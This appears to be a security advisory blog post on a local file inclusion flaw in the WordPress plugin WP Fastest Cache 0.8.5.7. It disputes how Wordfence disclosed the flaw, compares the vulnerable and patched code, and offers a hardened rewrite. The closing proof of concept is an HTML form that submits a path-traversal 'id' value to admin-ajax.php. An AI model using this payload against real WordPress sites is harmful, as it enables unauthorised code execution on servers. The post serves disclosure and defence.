26 May

Protecting You Against Wordfence’s Bad Practices: Local File Inclusion Vulnerability in WP Fastest Cache

Wordfence is putting WordPress websites at risk by disclosing vulnerabilities in plugins while leaving out the critical details needed to double check its work, in what appears to be an attempt to profit off of these vulnerabilities. We are releasing those details so that others can review the vulnerabilities and try to limit the damage Wordfence's practice could cause.

Wordfence describes the vulnerability in WP Fastest Cache version 0.8.5.7 as “The Local File Inclusion vulnerability allows an attacker to execute code on the target web server or on a site visitor’s browser. This enables the attacker to steal or manipulate data, perform a denial of service attack or enable additional attack types such as Cross Site Scripting.”

The relevant change in the next version, 0.8.5.8, was to restrict the AJAX accessible function wpfc_cdn_template_ajax_request_callback() in the file /wpFastestCache.php to users with the manage_options capability (by default, Administrators).

Code in 0.8.5.7:

public function wpfc_cdn_template_ajax_request_callback(){
	// No capability or nonce check here: any user who can reach
	// admin-ajax.php while logged in can call this function.
	ob_start();
	// $_POST["id"] is concatenated into the include path unsanitized, so
	// "../" sequences walk out of templates/cdn/ and any .php file on the
	// server can be included (and executed).
	include_once(WPFC_MAIN_PATH."templates/cdn/".$_POST["id"].".php");
	$content = ob_get_contents();
	ob_end_clean();

	$res = array("success" => false, "content" => "");

	// The same unsanitized path is read a second time to decide whether
	// the include "succeeded"; the file has already been included above.
	if($data = @file_get_contents(WPFC_MAIN_PATH."templates/cdn/".$_POST["id"].".php")){
		$res["success"] = true;
		$res["content"] = $content;
	}

	echo json_encode($res);
	exit;
}

Code in 0.8.5.8:

public function wpfc_cdn_template_ajax_request_callback(){
	// 0.8.5.8 adds only this capability check; the include path built
	// from $_POST["id"] below is unchanged.
	if(current_user_can('manage_options')){
		ob_start();
		include_once(WPFC_MAIN_PATH."templates/cdn/".$_POST["id"].".php");
		$content = ob_get_contents();
		ob_end_clean();

		$res = array("success" => false, "content" => "");

		if($data = @file_get_contents(WPFC_MAIN_PATH."templates/cdn/".$_POST["id"].".php")){
			$res["success"] = true;
			$res["content"] = $content;
		}

		echo json_encode($res);
		exit;
	}else{
		wp_die("Must be admin");
	}
}

Wordfence's description notably doesn't mention that the attacker needs to be logged in to WordPress to exploit this, which significantly limits the severity of the vulnerability. Note also that the fix in 0.8.5.8 only gates the function behind a capability check: $_POST["id"] is still concatenated into the include path without any sanitization, and the function shown contains no nonce check (check_ajax_referer()), so a user with the manage_options capability can still include arbitrary .php files from the server by path traversal.
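As an added example (not code from WP Fastest Cache, and not Wordfence's), here is how the callback could be written to remove the include-path problem rather than only gating it behind a capability. It assumes the plugin's WPFC_MAIN_PATH constant (the plugin directory, with a trailing slash) and the templates/cdn/ layout visible in the excerpts above; the class name and the nonce action 'wpfc_cdn_template' are hypothetical, and the hook name is inferred from the action parameter used in the proof of concept below.

```php
<?php
// Added example, not WP Fastest Cache's own code. Assumes WPFC_MAIN_PATH
// (the plugin's directory, with trailing slash) and the templates/cdn/
// layout from the excerpts above. The class name and the nonce action
// 'wpfc_cdn_template' are hypothetical.
class Wpfc_Cdn_Template_Hardened_Example {

    public static function register() {
        // Register only the authenticated hook (no wp_ajax_nopriv_ variant),
        // so logged-out visitors never reach the callback. The hook name
        // follows from action=wpfc_cdn_template_ajax_request in the PoC.
        add_action('wp_ajax_wpfc_cdn_template_ajax_request',
                   array(__CLASS__, 'callback'));
    }

    // Called from the admin page that builds the AJAX request, so the
    // request carries a nonce the callback can verify.
    public static function nonce_for_request() {
        return wp_create_nonce('wpfc_cdn_template');
    }

    public static function callback() {
        // 1. Capability check, as in 0.8.5.8.
        if (!current_user_can('manage_options')) {
            wp_send_json_error(array('message' => 'Must be admin'), 403);
        }

        // 2. Nonce check: a plain cross-site form post (like the PoC HTML)
        //    submitted by a logged-in admin's browser is rejected here.
        check_ajax_referer('wpfc_cdn_template', 'nonce');

        // 3. Validate the id as a bare name, not a path: letters, digits,
        //    "-" and "_" only, so "../", "/" and NUL can never reach the path.
        $id = isset($_POST['id']) ? wp_unslash($_POST['id']) : '';
        if (!is_string($id) || !preg_match('/^[A-Za-z0-9_-]{1,64}$/', $id)) {
            wp_send_json_error(array('message' => 'Invalid template id'), 400);
        }

        // 4. Allow-list against the template files that actually exist in
        //    templates/cdn/, then confirm the resolved path is still inside
        //    that directory (defence in depth against symlinks).
        $base = realpath(WPFC_MAIN_PATH . 'templates/cdn');
        if ($base === false) {
            wp_send_json_error(array('message' => 'Template directory missing'), 500);
        }
        $files = glob($base . '/*.php');
        if ($files === false) {
            $files = array();
        }
        $allowed = array();
        foreach ($files as $path) {
            $allowed[basename($path, '.php')] = $path;
        }
        if (!isset($allowed[$id])) {
            wp_send_json_error(array('message' => 'Unknown template'), 404);
        }
        $file = realpath($allowed[$id]);
        if ($file === false || strpos($file, $base . DIRECTORY_SEPARATOR) !== 0) {
            wp_send_json_error(array('message' => 'Unknown template'), 404);
        }

        // 5. Render the template exactly as before, but from the vetted path.
        ob_start();
        include $file;
        $content = ob_get_clean();

        wp_send_json_success(array('content' => $content));
    }
}
```

The order matters: the capability and nonce checks run before any user input is touched, and the id is treated as a key into an allow-list derived from the real directory contents rather than as a path fragment, so there is no string the attacker can send that selects a file outside templates/cdn/. The realpath() comparison is redundant with the allow-list on a normal install, but it catches a symlink dropped into the template directory.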

Proof of Concept

The following proof of concept will cause a file named test.php located in the root directory of the WordPress installation to be included. Assuming WPFC_MAIN_PATH is the plugin's own directory, the five "../" segments walk up from templates/cdn/ through the plugin directory, /wp-content/plugins/ and /wp-content/ to the WordPress root, and the plugin appends ".php" to the value.

Make sure you are logged in to WordPress, ideally as a subscriber since they have the least capabilities. Also, make sure to replace "[path to WordPress]" with the location of WordPress.

<html>
 <body>
 <form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="POST">
 <input type="hidden" name="action" value="wpfc_cdn_template_ajax_request" />
 <input type="hidden" name="id" value="../../../../../test" />
 <input type="submit" value="Submit" />
 </form>
 </body>
</html>
